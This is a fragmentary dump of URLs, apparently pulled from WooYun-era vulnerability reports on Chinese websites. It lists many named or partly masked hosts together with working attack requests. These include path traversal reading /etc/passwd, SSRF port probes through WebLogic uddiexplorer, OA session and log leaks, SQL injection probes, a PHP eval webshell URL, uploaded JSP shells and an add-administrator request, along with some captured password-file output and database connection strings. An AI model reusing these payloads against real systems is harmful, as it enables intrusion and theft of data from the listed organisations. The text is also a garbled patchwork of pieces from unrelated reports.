b58afb98bb94616a5e0b3ed2f2731fea:f4fpq4JZhZXdK8jYSoIHSp52rw1j69k0 aeb6e0c06c65025bdbe0d4281bc741e5:XTkxCfPrXz33tcNhOjl07ArazpnWqYFj http://**.**.**.**/run/index.php?num=541 http://**.**.**.**/news_show.asp?nid=336 http://**.**.**.**/news_show.asp?nid=336 http://cme.gxwskjw.91huayi.com/report/publicedPassedSummary.aspx?displayMode=1&frontForUnit=1&holdYear=11&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101 http://**.**.**.**/bugs/wooyun-2015-0145598 http://221.226.125.200/uddiexplorer/SearchPrivateRegistries.jsp http://221.226.125.211:8001/uddiexplorer/SearchPublicRegistries.jsp http://221.226.125.220:8001/uddiexplorer/SearchPublicRegistries.jsp http://221.226.125.201///uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.219:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://221.226.125.201///uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.219:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://wm1.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm2.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm4.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2 http://122.227.235.74:4389/yyoa/ext/https/getSessionList.jsp?cmd=getAll 
http://www.lygdfyy.com.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://222.175.187.147:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://222.189.156.67:8089/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.hxgroup.co:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://mail.228.com.cn/ http://gywsw.91huayi.com/Page/PageL3.aspx?lm=1 http://58.32.246.78:8380/ http://pet.sina.com.cn http://poke.petkoo.com/Member/Register.shtml http://om.wxmovie.com/ http://ad.wxmovie.com/test1.php http://**.**.**.**/vip//index.php?cate_id=67 http://**.**.**.**/plus/mytag_js.php?aid=1 inurl:Article_Print.asp http://**.**.**.**/10lada/Article_Print.asp?ArticleID=7820 http://**.**.**.**/more.php?TYPE=news&PAGE=7 http://**.**.**.**/more.php?TYPE=news&PAGE=7 http://**.**.**.**/affiche_show.aspx?strAfficheId=273 http://**.**.**.**/affiche_show.aspx?strAfficheId=273 http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey= http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey= http://106.2.161.16:8080/ http://redmine.xamama.com.cn:81/ http://**.**.**.**/loginOA.aspx TeamViewer:656464137 https://**.**.**.**/gangjian/work/blob/dfd1696a5250b42d393cacfafe06d4f30767b1b5/ServiceAreaClient/Docs/%E5%A4%96%E7%BD%91URL.txt http://**.**.**.**/bugs/wooyun-2015-0145758 http://**.**.**.**/***_detail.php?nid=761 http://**.**.**.**/trademark.php?id=43 http://**.**.**.**/trademark.php?id=43 http://**.**.**.** http://**.**.**.**/login.aspx http://**.**.**.**/ http://www.mazda.com.cn/ http://www.mazda.com.cn/admin.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**//aea/Download?strName=1.txt&strPath=../../../../../../../../../../etc/passwd http://219.143.252.170/seeyon//logs/login.log http://219.143.252.170/seeyon/ http://221.8.57.99/ http://**.**.**.**:7001/cbdcpt/login.jsp http://**.**.**.**:7001/DaTa/cmd.jsp http://baike.120ask.com/ http://baike.120ask.com http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2 
http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2 http://**.**.**.**/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=01 http://**.**.**.**/hbwz/qtpage/hdjl/zxzx_info.jsp?id=20151005190032 URL:http://b2cmob.baoxian.com/b2cmobServer/mobileFunctionShowNum.do?userId=8a82839450ff28e30151095c30bb2f85 http://**.**.**.**/web/web/web2/show_new.asp?bh=488 http://wap.hihoku.com http://**.**.**.**/ http://www.zdtdb.com/news_view.asp?id=3289&classid=2 http://cigna.sysu.edu.cn/enMain/news/contact.aspx?no=101&pId=65 http://**.**.**.**/xzsme/index.jsp http://**.**.**.**/mall/g7qukhTRCcNB4.html http://**.**.**.**/gceAccount.php?action=20 width:100%;overflow:scroll;display:none http://103.235.46.165 http://103.235.46.165/index.php/Manage/login post:username=test&password=test http://103.235.46.165/index.php/Manage/login post:username=test'&password=test http://jxxyzc.91huayi.com http://info.cqvip.com http://**.**.**.**/usermanager/userexistscheck.aspx http://www.fanhua.net.cn/2xwdt_1jtxw_xx.aspx?nid=16774 http://**.**.**.**/bugs/wooyun-2015-0123238 http://**.**.**.**/systemplateweb/IndexHeade.aspx?Series=1&XXDM=440307000003 http://**.**.**.**/systemplateweb/IndexHeade.aspx?Series=1&XXDM=440307000003 http://**.**.**.**/demo/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.oneplus.cn/ http://www.1218.com.cn/index.php/product?id=23 http://**.**.**/article.phpid=433&c=46,47 http://**.**.**.**/Home/default.asp http://**.**.**.**:7001/CRM/ http://**.**.**.**:7001/CRM/user/loginIntoSys.do http://**.**.**.**:7001/CRM/one.jsp http://**.**.**.**:7001/CRM/wooyun.jsp 
http://**.**.**.**/nano/V2007/profiles.asp?sno=33 http://**.**.**.**/ http://**.**.**.**:80/ http://121.43.74.72/yaie http://121.43.74.72/yaie/operinfo_userLogin.do http://school.dev.gaofen.com/index.php?action=college_majordata&college_id=10315&mod=college_api&num=100&provid=27&wl=1&year=2014 http://www.super8.com.cn/ http://**.**.**.**/contact.aspx?sortId=30 http://**.**.**.**/show.aspx?cid=1150&sortId=58 http://live.acfun.tv http://**.**.**.**/newsPage.php?nsId=161 http://**.**.**.** http://pop.by-health.com/index.php?retid=594056532fc265c38&unautologin=1 http://partner.funshion.com/index.php http://111.205.151.151/seeyon//logs/login.log http://111.205.151.151/seeyon/ http://www.tcldisplay.com/cn/home/index.html http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111 http://asc.ruc.edu.cn http://nxzy.hnagroup.com/userAct/selectQueryUserActs.action?destination=11 http://58.246.61.238/seeyon/ http://**.**.**.**/bugs/wooyun-2015-0150182/trace/b9c08621a39ece1ee9eaaba3268ff5a5 http://**.**.**.**/opd/service-e.aspx?id=0205&Page=11& http://**.**.**.**/BCrg/opd/service-e.aspx?id=1000&Page=11& http://**.**.**.**/opd/service-e.aspx?id=1100&Page=11& http://**.**.**.**/TCRG/opd/service-e.aspx?id=0208&Page=11& http://**.**.**.**/opd/opd/service-e.aspx?id=0300&Page=11& http://**.**.**.**/opd/service-e.aspx?id=0122&Page=11& http://**.**.**.**/ymrg/opd/service-e.aspx?id=0400&Page=11& http://**.**.**.**/opd/service-e.aspx?id=1100&Page=11& http://**.**.**.**/opd/service-e.aspx?id=0120&Page=11& http://**.**.**.**/YMRG/opd/service-e.aspx?id=3301&Page=11& http://oa.funshion.com/seeyon//logs/ctp.log http://oa.funshion.com/seeyon/ http://**.**.**.**/price_nav.php?id=44 http://**.**.**.** http://www.96wan.com/websiteapi/website_serverlist?gid=6 http://a.120ask.com/login?from=aHR0cDovL3d3dy4xMjBhc2suY29tLw== 
http://**.**.**.**/Informationservice_new/right/loginExcute.jsp?pmail=admin&pcode=123456 http://www.ccoop.com.cn/index.html cn:3306/monitor_***** postgresql://h155.mzhen***** jdbc:postgresql://114.112.8***** postgresql://114.112.89***** dbc:postgresql://h1***** cn:3306/monitor_***** jdbc:postgresql://1***** api.mzhen.cn/monitor/v1/target/show_ http://access.miaozhen.com http://admonitor.miaozhen.com http://tvmonitor.miaozhen.com cn:9527/tv_rerun/_ http://**.**.**.**/plus/teacher.php?id=85 http://**.**.**.**/plus/teacher.php?id=85 http://**.**.**.**/brands.php?id=9 URL:http://g.qq.com/admin http://127.0.0.1/1.js URL:http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=1&page_no=1&page_size=10&topic_id=帖子ID&author_id=0&rank_way=5 http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=1&page_no=1&page_size=10&topic_id=3025002759233984&author_id=0&rank_way=5 http://sde.sdu.edu.cn http://sde.sdu.edu.cn/FCKeditor/editor/filemanager/connectors/uploadtest.html http://spxy.swu.edu.cn/show/show.php?id=2926 http://**.**.**.**/?page_id=3572 http://**.**.**.**/?page_id=3572 http://60.28.104.133:9060/yyoa/assess/js/initDataAssess.jsp http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.28.104.133:9060/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam http://**.**.**.**/show.aspx?ID=2015101609225000015 http://**.**.**.**/Rsc2/jobs/job.php?id=420 http://**.**.**.**/admin/login.php http://**.**.**.**:8088/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/admin/login.php 
http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/bugs/wooyun-2014-085980 http://www.changan-mazda.com.cn/index.php/admin/Auth http://m.jiashuangkuaizi.com height:20px;BORDER http://**.**.**.**/login.aspx http://**.**.**.**/news-x.php?tid=174&id=879 http://**.**.**.**/database/search/ejournal/JournalList_user.asp http://**.**.**.**/database/search/ejournal/JournalList_user.asp http://**.**.**.**/hk/zh-hk/vertical-markets-industry1-casestudy.php?idpk=7§ion=4 http://**.**.**.**/ http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx?WSDL http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/DataUpdate soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/DataUpdate2 soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/PKExchange soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://demo.haidao.la/uploadfile/avatar/391_50.jpg/1.php?cmd=echo%20__FILE__ http://www.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://www.flyertrip.com/hotels/personalCenter/myOrderAll.php?id=2 http://**.**.**.**/souvenir_detail.php?id=1 http://**.**.**.**/souvenir_detail.php?id=1 http://**.**.**.**/SsResult.aspx?wd=2015 http://**.**.**.**/NewsPage.aspx?fid=6450 
http://**.**.**.**/login/ssoLogin_login2.action http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**:6789/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**:6789/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:6789/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**:6789/yyoa/createMysql.jsp http://www.changan-mazda.com.cn//market/2015axelaanniversary/index/info/11/%5c http://www.changan-mazda.com.cn:80//excellenceplan/position?keyword=&type=%5c http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=50135841&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=51114705&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=51396819&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/?section=Promotion&id=123 http://**.**.**.**/?section=Promotion&id=123 http://**.**.**.**/products.php http://**.**.**.**/products.php http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526 http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526 https://219.141.242.12 http://10.100.1.83:7001/teamserver/faces/home.jsp http://121.193.130.234:8087/lesson.php?lesson=S207E111&college_id=207 http://121.193.130.234:8087/test.php http://121.193.130.234:8080 
http://121.193.130.234:8087/lesson.php?lesson=S207E111&college_id=207 http://121.193.130.234:8087 http://**.**.**.**/**.**.**.**.rar career-whrc.huawei.com/pages/handle/register.handle.php http://**.**.**.**/newfangshou.php?id=44 http://**.**.**.** http://tj.ujn.edu.cn http://tj.ujn.edu.cn http://***********/index.php/news/views/id/425 http://**.**.**.**/about.php?aid=9 http://**.**.**.**/about.php?aid=9 http://wooyun.org/bugs/wooyun-2015-0116152 http://chudan.ehuatai.com/ index.php/Index/index/ http://**.**.**.**/user/zpzz/addZpzz.action http://szjyzx.cnu.edu.cn http://xbgf.nwpu.edu.cn:80/ F956C96A974341E1ADEE6111EF968CDF:FG=1 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/kwgonggao.jsp?subtype=8 http://**.**.**.**//Isv.ashx?action=addadmin&adminuser=admin1&adminpassword=111111&guid=2 http://track.haolyy.com/app.zip FCKeditor:BasePath FCKeditor:UserFilesPath FCKeditor:AttachDirectory http://image.izacholsm.com/fkImages/"/ http://localhost http://www.greentomail.com/eid=55 http://image.izacholsm.com/t/zz?t="/ http://image.izacholsm.com/t/"/ http://dec.jlu.edu.cn http://dec.jlu.edu.cn http://yanchuan.cn/company/index.html http://115.28.114.124/api/v1/contact/list http://**.**.**.** http://101.198.156.228/phpmyadmin/ http://**.**.**.**:99/ http://**.**.**.**:99//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://search.lenovo.com/search?isort=score&lbc=lenovo&p=KK&pw=Thinkpad%20X1%20Carbon%203rd%20Generation&rk=5&srid=S12-USWSD03&ts=custom&uid=72429456&view=grid&w=X1%20Carbon http://erp.csztv.cn/member http://api.honglingjin.cn/westore/mall/position http://61.142.112.67/barcode/Signout.service http://user.91160.com/find/forget.html http://euro2012.touzhu.cn/experts_list/2'/1存在sql注入漏洞 http://**.**.**.**/icarttw/help/shoppingCartAllRowzbin.action?yhid=5672680&_=1448764540382 http://**.**.**.**/ http://bi.mioji.com http://**.**.**.** http://oa.guokinghk.com:8080/yyoa/assess/js/initDataAssess.jsp 
http://oa.guokinghk.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.guokinghk.com:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://218.61.139.232:8080/ http://218.61.139.232:8080/console/login/LoginForm.jsp http://**.**.**.**/jy/admin?c=login http://**.**.**.**/zs/admin http://**.**.**.**/server-status http://**.**.**.**//jy/include/class/c_account.php http://**.**.**.**/jy/include/ http://**.**.**.**/phpmyadmin/main.php http://**.**.**.**/jy/include/js/kindeditor/ http://**.**.**.**/jy/include/js/kindeditor/php/demo.php这个地方可以POST一个反射型XSS出来,不过这样打出的xss貌似是鸡肋。。提交的POST数据: https://202.108.103.153 https://oa.ehuatai.com http://mail.ehuatai.com/ http://www.pig.ai http://www.pig.ai/aboutus http://www.ruifilm.cn/index.php/module/action/param1/${@eval%28$_POST[c]%29 http://**.**.**.**/kzjj/login.asp http://**.**.**.**:7001/cbdcpt/login.jsp http://**.**.**.**:7001/ewebeditor/admin/default.jsp http://**.**.**.**/dlarea/dl_model.php?bid=165&bname=%E7%B4%A2%E5%B0%BC%E7%88%B1%E7%AB%8B%E4%BF%A1&mid=4070*&mname=W810&from= http://**.**.**.**/dlarea/dl_model.php?bid=128&bname=%E9%95%BF%E8%99%B9&mid=1835*&mname=008-IIIM&from=qs http://**.**.**.**/iftbt/BT1R21C.php?f_bdno=103061001H0092 http://**.**.**.**/ip/index.php http://www.flyertrip.com/hotels/personalCenter/mydata.php?flag=update&email=test111@test.com&nickname=test111@test.com,参数应该看的懂吧,然后登陆test222账号去访问这个链接之后,test222的资料就会被更改如图 http://121.43.74.31/drm/index.htm http://www.tianhong.cn/order/my_address!edit.html?addressId=50232460 http://www.bjpost.com.cn http://115.239.210.62:8080 c3.cofco.com/data/test.php c3.cofco.com/data/file.php c3.cofco.com/config/test.php第一个构造出路径 http://c3.cofco.com/config/file.php http://219.141.242.62/huataiwechart/index_neu.jsp http://219.141.242.62/huataiwechart/tmp/checkcodeClaim http://219.141.242.62/huataiwechart/tmp/checkcodeClaim http://oa.gtadata.com/C6/Jhsoft.Web.login/PassWordNew.aspx http://oa.gtadata.com/C6/Jhsoft.Web.login/NewView.aspx?id=1 
http://oa.gtadata.com/C6/Jhsoft.mobileapp/login/login.html http://www.infzm.com/mobile/get_news_by_datetime?platform=android&hash=f2b0770cfdf697748154b963e4d9a092&cat_id[]=2870&limit=20&direct=newer&datetime=2015-11-28%2023:45 http://**.**.**.**:85/search.aspx http://**.**.**.**/gjjcx/search.aspx http://**.**.**.**/gjjcx/ http://**.**.**.**:8002/ http://**.**.**.**/个人查询处存在sql注入,在提交单位号时进行构造,则可进行报错注入,当前库为bzgjj http://design.cetools.cn/02.rar http://111.13.108.103/index.php/login http://www.oppo.com/my/r7-plus-preorder/findStore.php?location=-1 http://wel.xmu.edu.cn/ch/research/mid/5/catid/47 http://wel.xmu.edu.cn/ch/research/mid/5/catid/47%20and%201=1 http://**.**.edu.cn/ch/research/mid/5/catid/47%20and%201=2 http://wel.xmu.edu.cn/ch/research/mid/5/catid/48 http://wel.xmu.edu.cn/ch/nlist/mid/5/catid/53/ http://wel.xmu.edu.cn/ch/scientific/mid/5/catid/23 http://**.**.**.**/product_fl.asp?sid=120 http://**.**.**.**/c6/Jhsoft.Web.login/PassWordNew.aspx http://**.**.**.**/c6/Jhsoft.Web.login/NewView.aspx?ID=1 https://github.com/Rex---/hscloud-3.0.x/blob/aec6d117b36110ad0346929d66d79041b301cd66/mail/src/test/resources/mail.properties www.xrnet.cn http://192.168.5.69:8080/web-1.1-SNAPSHOT http://localhost:8080/webSite http://www.haidao.la/index.php?m=Member&c=Public&a=repwd http://**.**.**.**:8088/SKLSUG/indexlis.jsp http://42.96.249.54/ http://**.**.**.**/test/ https://github.com/Rex---/hscloud-3.0.x/blob/aec6d117b36110ad0346929d66d79041b301cd66/mail/src/test/resources/mail.properties api.jucaicat.com/jcc818/BankCardList http://mobile.ztgame.com/mobile/index.php http://mobile.ztgame.com/m_login.php http://219.143.69.58:80/login.php http://219.143.69.58:80/ http://video.hkcts.com/mysql/ http://video.hkcts.com/mysql/cts.tar.gz http://video.hkcts.com/install/index.php http://video.hkcts.com/adminsoft/index.php http://www.yuncars.cn/appSpread/ http://mbu.baidu.com http://www.zhuaqianmao.com/about.html http://www.xiaojinniu.com/download_app?f=kp 
http://labsafe.ruc.edu.cn/index.php?a=examtraining&c=index&id=1&m=member&type=TF http://house.mama.cn http://api.yijifen.com/EScore_API/common/comfirmActivateCheckGet.do?appid=1056497222&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731 http://wiki.gw500.com/xmlrpc bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** ews:/et***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** aemon:/:/s***** owner:/d***** user:/:/***** Server:/var/l***** OProfile:/***** ver:/var/lib***** arpwatch:/***** ntp:/sbi***** bus:/:/***** daemon:/:***** named:/***** SSH:/var/empty***** User:/var/lib***** User:/var/li***** daemon:/:/***** pd:/var/lib/avahi-***** er:/etc/X11/***** gdm:/sbi***** www:/***** tomcat6:/***** Checker:/var/c***** uite:/var/run/qu***** tcache:/:/s***** ftp://mrtg.gw500.com/ http://**.**.**.**/catalog/product_info.php?products_id=5&language=tc&osCsid=8a474fc2318cbdd1bf82cfc28e45f8b6 http://**.**.**.**/catalog/product_info.php?products_id=5&language=tc&osCsid=8a474fc2318cbdd1bf82cfc28e45f8b6 http://**.**.**.**/HealthCare/MemberAppointmentFAction@forwardToFeature.action http://**.**.**.**/HealthCare/MemberAppointmentFAction@forwardToFeature.action http://**.**.**.**/test.txt http://votegd.gridinn.com/utility/convert/index.php http://218.58.70.201 http://**.**.**.** http://**.**.**.**:8383 http://**.**.**.**:8383/ewebeditor/jsp/upload.jsp?action=save&type=image&style=mini&cusdir=&skey= width:100% http://**.**.**.**:8383/ewebeditor/uploadfile/20151130154318893.jsp http://**.**.**.**/login.aspx http://**.**.**.**/login.aspx http://123.234.41.10:88/TISS/ http://bbs.96wan.com/.svn/entries code:sqlmap.py http://resume.shenzhenair.com/one8.jsp http://resume.shenzhenair.com/wpp.jsp www.zrbao.com https://**.**.**.**/duffiye/duffiye/blob/8cc21a1446ae05f5f83cb5bcf8befa75e8766621/duffiye-admin/src/main/resources/project.properties http://**.**.**.**/wpage/content.jsp?id=2947 
index.php/account/ajax_useremail http://cps.huatu.com http://hd.rog.xoyo.com/Controller_Basesys_Person/addPerson http://test.99.com/ http://test.99.com/reportHome?inner=1 http://test.99.com/registeruser/CookInsert?userAccount=你的用户名&inner=1 http://test.99.com/registeruser/CookInsert?userAccount=admin&inner=1 http://**.**.**.**/user/loginUI.action http://**.**.**.**/goods.php?cat_id=33 jdbc:oracle:thin:@**.**.**.**:1521:hcr http://220.181.8.205:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://sbs.m.sogou.com/phpmyadmin/setup/index.php https://github.com/wangrui-spiderNet/HnProject/blob/8f28e44933def827c4b0cfb7d9b34e888451d470/WorkLife/src/com/hna/lmail/ui/activities/SplashActivity.java https://anyoffice.hnagroup.com/-custom/any-office1.html http://**.**.**.**/res/active/4G/upload.jsp http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp http://**.**.**.** https://github.com/xiebin2015/autotest/blob/bd277279bfaf2b739409e517407a25f07d767e86/pay-autotest-web/src/main/resources/mail.properties http://**.**.**.**/yhlnew/NewInfos.aspx?id=3082 http://**.**.**.**/yhlnew/NewInfos.aspx?id=3082 https://github.com/understand1006/JDiPad_jenkins https://github.com/xushao0305/toolbox https://github.com/xushao0305/toolbox/tree/5f95623da179161b75eb37f22f8e3db9bddf622a/analyze 
http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6 http://**.**.**.** http://**.**.**.**/user/login http://snsvote.hupu.com/ShowInner.php?voteid=275590&showtype=bbs_cut&uid=151585 http://**.**.**.**/editor/tiny_mce/plugins/uploda.php,可上传一句话木马,目录传到plugins目录下,使用的是ewebeditor http://**.**.**.**/public/login.aspx http://**.**.**.**/public/login.aspx http://os.wasu.cn/phone/phone.php?id=1 http://os.wasu.cn/phone/editphone.php?phone=1 http://ad.ijinshan.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.reagent.com.cn:666/Vip/bg/adminlogin.jsp http://www.reagent.com.cn:666/Vip/login.jsp http://**.**.**.**/ http://**.**.**.**/C6/Jhsoft.mobileapp/login/login.html index.php/Gongyong/sblist/id/11.html http://wechat.rongmomo.cc http://wireless.xiaozhu.com/app/xzfk/android/220/order/list?length=10&_=1447840135385&sessId=*********************&bizState=ongoing&offset=0&dispathChannel=xiaozhu&userId=*********** http://**.**.**.**/news_daily.php?id=523 http://**.**.**.**/news_daily.php?id=523 http://**.**.**.**/Search/Search.asp http://**.**.**.**/Search/Search.asp http://sf-ocs.sf-express.com:8080/live800/downlog.jsp?path=/&fileName=/etc/passwd http://wbgh.youxinpai.com http://oa.99114.com/ http://live800.wan.renren.com//live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/?p=employee&store=513&employee_id=240 http://**.**.**.**/?p=employee&store=513&employee_id=240 http://online.cmfchina.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://wooyun.org/bugs/wooyun-2015-0137238 http://crm.emar.com/ http://crm.emar.com/ajax/uploadfile.php?DontCheckLogin=1 http://crm.emar.com/tmpfile/upd_1VOJBb.txt http://**.**.**.**/admin/login.do?activity=logout&empid=-1 http://**.**.**.**:88/login/Login.jsp?logintype=1 http://**.**.**.**:88/tools/SWFUpload/upload.jsp height:20px;BORDER 
http://consumer.huawei.com/support/services/service/tcsReservation/findReservationByReservationNo?jsonp=jQuery191020111111365258694_1448884905233&reservationNo=YY15113000377&mobile=13333333333&siteCode=cn&_=1448884905248 http://consumer.huawei.com/support/services/service/tcsReservation/reservation/time?jsonp=jQuery191020111111365258694_1448884905233&networkCode=CNA1083S05&reservationDate=2015-12-01&_=1448884905245 http://**.**.**.**/public/index.php?main=1 http://**.**.**.**/oicindex/content.php?type=1 http://**.**.**.**/public/view.php?main=3&sub=27&ssub=30&id=1906 http://**.**.**.**/public/searchdata.php?lang=tw&textfield2=88952634&search=88952634&select2=1 http://**.**.**.**/public/view.php?main=3&sub=27&ssub=30&id=1906 http://**.**.**.**/intro.php?id=1 http://**.**.**.**/news.asp?cat=82&year_date=2003 http://www.dk-fx.com/zh-cn/read.jsp?id=13~如图所示: http://**.**.**.**:80/ F956C96A974341E1ADEE6111EF968CDF:FG=1 http://**.**.**.**/index.php?currency=HKD&cPath=45 http://**.**.**.**/index.php?currency=HKD&cPath=45 welomo.com/index.php/Index/brand_details?sl_id=27 http://106.37.237.220/seeyon//logs/login.log http://106.37.237.220/seeyon/ http://info.swcaac.gov.cn/wxdw/webui/wfmRwgl_Sqs_Show.aspx?gwId=1&IfSpm=1 http://xbgjxt.swu.cn/ http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=138061&jobid=28139&code=64f0a9a558419c629275fb3410abcaef http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=54059&jobid=28139&code=daf8545d125eeadc2c983cb6eb880739 http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=141244&jobid=28139&code=12b6d7d2467c8267e6cad9e7099812fc 